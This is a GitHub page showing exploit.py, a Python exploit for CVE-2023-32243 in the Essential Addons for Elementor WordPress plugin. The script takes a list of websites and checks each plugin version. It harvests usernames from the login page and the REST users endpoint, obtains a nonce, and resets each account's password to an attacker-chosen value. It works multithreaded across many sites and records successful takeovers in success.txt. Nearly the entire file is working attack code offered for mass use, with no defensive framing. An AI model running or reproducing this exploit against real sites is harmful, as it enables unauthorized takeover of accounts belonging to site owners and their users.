forked from RandomRobbieBF/CVE-2023-32243
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
144 lines (107 loc) · 4.2 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
import re
import sys
import requests
import argparse
from colorama import Fore, Style
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from concurrent.futures import ThreadPoolExecutor
def check_version(target):
try:
r = requests.get(f"{target}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt", verify=False)
version = re.search(r"Stable tag: (.*)", r.text).groups()[0]
except:
print(Fore.RED + 'Error...')
exit()
if int(version.replace('.', '')) < 572 and int(version.replace('.', '')) > 539:
return True
else:
return False
def save_result(target, username, password):
result = f"{target}|{username}|{password}\n"
with open("success.txt", "a") as file:
file.write(result)
def exploit(target, username, password):
s = requests.Session()
data = {
'action': 'eael_get_token'
}
try:
r = s.post(f'{target}/wp-admin/admin-ajax.php', data=data, verify=False)
except:
return
try:
nonce = re.search(r"\"nonce\":\"(.*)\"}", r.text).groups()[0]
except:
return
payload = {
'eael-resetpassword-submit': 'Reset',
'widget_id': 1,
'page_id': 1,
'eael-resetpassword-nonce': nonce,
'eael-pass1': password,
'eael-pass2': password,
'rp_login': username
}
try:
r = s.post(f'{target}/wp-admin/admin-ajax.php', data=payload, verify=False)
except:
return
if re.search(r"Your password has been reset", r.text) is not None:
save_result(target, username, password)
print(Fore.GREEN + f"Successful: {target} ({username} - {password})")
else:
print(Fore.RED + f"Unsuccessful: {target} ({username} - {password})")
def find_usernames_html(url):
response = requests.get(url, verify=False)
soup = BeautifulSoup(response.text, 'html.parser')
users = []
for input_tag in soup.find_all('input', {'name': 'log'}):
users.append(input_tag.get('value'))
return users
def find_usernames_wp_json(url):
response = requests.get(f"{url}/wp-json/wp/v2/users", verify=False)
if response.status_code == 200:
users = []
try:
json_response = response.json()
except:
return users
for user in json_response:
if 'slug' in user:
users.append(user['slug'])
return users
else:
return []
def find_usernames(target):
usernames_html = find_usernames_html(f"{target}/wp-login.php")
usernames_wp_json = find_usernames_wp_json(target)
usernames = usernames_html + usernames_wp_json
return usernames
if __name__ == "__main__":
print(Fore.BLUE + "\t\t\t\t|*|*|*|*|*| WordPress Exploit |*|*|*|*|*|")
print(Fore.BLUE + "\t\t\t\t")
print(Fore.RED + "\t\t\t\t M@rAz Ali & MR.Persia")
print(Fore.RED + "\t\t\t\t")
print(Fore.RED + "\t\t\t\t|*|*|*|*| https://t.me/public_html |*|*|*|*|")
print(Style.RESET_ALL)
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-32243.')
parser.add_argument('-l', '--list', required=True, help='Path to the file containing the list of websites')
parser.add_argument('-t', '--threads', type=int, default=1, help='Number of threads (default: 1)')
parser.add_argument('-p', '--password', required=True, help="New password for the account")
args = parser.parse_args()
with open(args.list, "r") as file:
websites = file.read().splitlines()
with ThreadPoolExecutor(max_workers=args.threads) as executor:
for target in websites:
print(Fore.BLUE + f"Target: {target}")
if check_version(target):
print(Fore.YELLOW + "Vulnerable version found. Starting exploitation...")
usernames = find_usernames(target)
for username in usernames:
executor.submit(exploit, target, username, args.password)
else:
print(Fore.YELLOW + "Not vulnerable.")
print(Style.RESET_ALL)
print(Fore.GREEN + "Exploitation completed. Results are saved in success.txt.")